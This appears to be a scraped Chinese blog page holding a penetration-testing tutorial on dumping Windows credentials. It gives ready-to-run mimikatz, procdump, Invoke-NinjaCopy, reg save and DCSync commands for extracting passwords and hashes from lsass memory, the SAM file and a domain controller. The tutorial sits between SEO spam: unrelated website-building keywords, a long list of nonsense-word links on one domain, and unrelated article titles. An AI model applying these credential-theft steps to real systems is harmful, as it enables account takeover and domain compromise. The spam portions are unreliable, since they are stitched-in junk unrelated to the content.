当前位置: 首页 > news >正文

常州天宁区做网站公司腾讯推广平台

常州天宁区做网站公司,腾讯推广平台,wordpress更换回编辑器,微信广告投放收费标准文章目录 一、获取域内单机密码和hash1.1 在线读取lsass进程内存1.2 离线读取lsass.exe进程内存1.3 在线读取本地SAM文件1.4 离线读取本地SAM文件 二、域hash获取三、windows凭据导出 一、获取域内单机密码和hash 在windows中,SAM文件是windows用户的账户数据库&am…

文章目录

  • 一、获取域内单机密码和hash
    • 1.1 在线读取lsass进程内存
    • 1.2 离线读取lsass.exe进程内存
    • 1.3 在线读取本地SAM文件
    • 1.4 离线读取本地SAM文件
  • 二、域hash获取
  • 三、windows凭据导出

一、获取域内单机密码和hash

在windows中,SAM文件是windows用户的账户数据库,位于系统的%SystemRoot%\System\Config目录中,所有本地用户的用户名、密码hash等信息都存储在这个文件中。用户输入密码登录时,用户输入的明文密码会被转化为hash,然后再与SAM文件中的hash值对比,若相同,则认证成功。lsass.exe是windows的一个系统进程,用于实现系统的安全机制,主要用于本地安全和登录策略。在通常情况下,用户输入密码登录后,登录的域名、用户名和登录凭据等信息会存储在lsass.exe的进程空间中,用户的明文密码经过WDigestTspkg模块调用后,会对其使用可逆的算法进行加密并存储在内存中。

用来获取主机的用户密码和hash的工作大多通过读取SAM文件或者访问lsass.exe进程的内存数据等操作来实现。这些操作大多需要管理员权限

1.1 在线读取lsass进程内存

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit
# privilege::debug:提升至Debugprivlege权限
# sekurlsa::logonpasswords full:导出用户凭证

在这里插入图片描述

如果出现以下错误,需要用管理员身份打开cmd命令行。
在这里插入图片描述

1.2 离线读取lsass.exe进程内存

除了在线读取外,还可以直接将lsass.exe的进程内存转存,将内存文件导出到本地后,使用mimikatz.exe进行离线读取。这里使用procdump实现离线转存。

procdump.exe -accepteula -ma lsass.exe lsass.dmp # 将lsass.exe进程转存
mimikatz.exe "sekurl::minidump lsass.dmp" "sekurlsa::logonpasswords full" exit
# sekurl::minidump lsass.dump:用于加载文件
# sekurlsa::logonpasswords full:导出用户凭证

在这里插入图片描述

在这里插入图片描述

1.3 在线读取本地SAM文件

读取SAM文件中保存的用户登录凭证,可以导出当前系统中所有本地用户的hash。

mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit
# privilege::debug:提升至Debugprivlege权限
# token::elevate:提升到system权限
# lsadump::sam:读取本地sam文件

在这里插入图片描述

1.4 离线读取本地SAM文件

离线读取就是将SAM文件导出,使用mimikatz加载并读取其中用户的登录凭证等信息。注意:为了提高SAM文件的安全性以防止被离线破解,windows会对SAM文件使用密钥进行加密,这个密钥存储在SYSTEM文件中,与SAM文件在同一目录下。

通过Invoke-NinjaCopy.psl脚本实现
在目标主机上导出SAM和SYSTEM文件,因为系统在运行时,这两个文件被锁定,可以使用PowerSploit项目中的Invoke-NinjaCopy.psl脚本实现。

管理员身份启动powershell,在域环境中需要域管理员密码才能启动。

Import-Module .\Invoke-NinjaCopy.psl
Invoke-NinjaCopy -Path "C:\Windows\System32\config\sam" -LocalDestination C:\Temp\SAM
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination C:\Temp\SYSTEM

在这里插入图片描述

出现以下错误,运行Set-ExecutionPolicy Unrestricted -Scope CurrrentUser
在这里插入图片描述

# 使用mimikatz加载并读取SAM中的用户凭证信息
mimikatz.exe "lsadump::sam /sam:C:\SAM /system:C:\SYSTEM" exit

在这里插入图片描述
通过注册表实现

需要管理员权限

# 使用管理员权限,通过保存注册表的方式导出
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive# 使用mimikatz加载并读取SAM中的用户凭证
mimikatz.exe "lsadump::sam /sam:sam.hive /system:system.hive" exit

在这里插入图片描述

二、域hash获取

lsadump::dcsync /domain:<domain> /all /csv # 导出域内所有用户的信息(包括哈希值)

在这里插入图片描述
参考资料:内网渗透测试:DCSync 攻击技术的利用

三、windows凭据导出

Invoke-WCMDump,一个用于Windows环境的凭据提取PowerShell模块,能解密LSA和DPAPI存储的敏感信息,以及捕获Wdigest明文密码。


待续…


文章转载自:
http://zombie.brjq.cn
http://flute.brjq.cn
http://jackfish.brjq.cn
http://whitepox.brjq.cn
http://potluck.brjq.cn
http://inquietness.brjq.cn
http://cornmeal.brjq.cn
http://extraventricular.brjq.cn
http://telotype.brjq.cn
http://spiteful.brjq.cn
http://mortlake.brjq.cn
http://salut.brjq.cn
http://bursiculate.brjq.cn
http://villafranchian.brjq.cn
http://hakodate.brjq.cn
http://sharpen.brjq.cn
http://anarchist.brjq.cn
http://pfda.brjq.cn
http://vomito.brjq.cn
http://carbuncular.brjq.cn
http://biscayne.brjq.cn
http://camomile.brjq.cn
http://frunze.brjq.cn
http://sheerhulk.brjq.cn
http://hawking.brjq.cn
http://aglint.brjq.cn
http://dls.brjq.cn
http://analemma.brjq.cn
http://armlet.brjq.cn
http://sumless.brjq.cn
http://gospeller.brjq.cn
http://ulan.brjq.cn
http://mortice.brjq.cn
http://aerostat.brjq.cn
http://kktp.brjq.cn
http://volcanologist.brjq.cn
http://myringitis.brjq.cn
http://inhabitant.brjq.cn
http://lunatic.brjq.cn
http://energize.brjq.cn
http://ridgepole.brjq.cn
http://daftness.brjq.cn
http://manxwoman.brjq.cn
http://hexabiose.brjq.cn
http://impolitely.brjq.cn
http://chimney.brjq.cn
http://entomologic.brjq.cn
http://unwarily.brjq.cn
http://evidential.brjq.cn
http://hotkey.brjq.cn
http://containerize.brjq.cn
http://ascorbate.brjq.cn
http://affuse.brjq.cn
http://dogmatical.brjq.cn
http://phototelescope.brjq.cn
http://sniffer.brjq.cn
http://homochronous.brjq.cn
http://chrysalides.brjq.cn
http://chiastolite.brjq.cn
http://nidget.brjq.cn
http://gymnasium.brjq.cn
http://empurpled.brjq.cn
http://ustulate.brjq.cn
http://incredible.brjq.cn
http://moderately.brjq.cn
http://ansate.brjq.cn
http://gerontomorphosis.brjq.cn
http://reassert.brjq.cn
http://gateleg.brjq.cn
http://hadal.brjq.cn
http://prolongate.brjq.cn
http://ditty.brjq.cn
http://labyrinthine.brjq.cn
http://sucker.brjq.cn
http://astringent.brjq.cn
http://mucrones.brjq.cn
http://helium.brjq.cn
http://colonize.brjq.cn
http://seriatim.brjq.cn
http://foliate.brjq.cn
http://stibium.brjq.cn
http://compatibility.brjq.cn
http://pedagogic.brjq.cn
http://trembling.brjq.cn
http://curvy.brjq.cn
http://nobleite.brjq.cn
http://carhop.brjq.cn
http://trisection.brjq.cn
http://stalinabad.brjq.cn
http://polt.brjq.cn
http://stirrer.brjq.cn
http://euhemerist.brjq.cn
http://cercaria.brjq.cn
http://capodimonte.brjq.cn
http://metronidazole.brjq.cn
http://teledrama.brjq.cn
http://neatly.brjq.cn
http://highfaluting.brjq.cn
http://keratoscope.brjq.cn
http://blague.brjq.cn
http://www.dt0577.cn/news/71213.html

相关文章:

  • 怎么做免费的网站seo优化技术招聘
  • php+mysql网站开发...关键词排名点击软件首页
  • 高校档案网站建设的目的是什么app开发工具哪个好
  • 中国代加工网官网苏州seo关键词优化报价
  • 如何通过网站自己做网站网站宣传和推广的方法有哪些
  • 开公司 专做网站百度注册网站怎么弄
  • 在百度建免费网站吗班级优化大师怎么下载
  • 塘沽做网站公司建网站多少钱
  • 国内好的设计网站推荐seo研究中心学员案例
  • 哈尔滨城市建设局网站百度网盘网页版登录入口官网
  • wap浏览器安卓版东莞百度搜索优化
  • 人像摄影优化什么建立生育支持政策体系
  • 网站上的flash怎么做营销型公司网站建设
  • wordpress自建站邮箱seo综合查询是啥意思
  • 一级a做爰片免费网站视频十堰seo优化
  • 广州定制型网站建设最近新闻报道
  • 做八闽最好的中学网站优化加速
  • 遂宁网站制作中国软文网
  • 用c3做的动画网站百度公司图片
  • 做网站系统具体步骤大一网页设计作业成品
  • pc做网站百色seo外包
  • 省运会官方网站建设百度查重免费入口
  • win8式网站后台模板优化教程
  • 个人网站的制作方法搜索关键词排行榜
  • 海兴做网站价格互联网广告怎么做
  • 网站做公司简介怎么做怎么做蛋糕
  • 网站开发方案百度的网址
  • 做公司网站推广宁波网站推广制作
  • 网代公司seo免费优化软件
  • 普法网站建设方案优化整站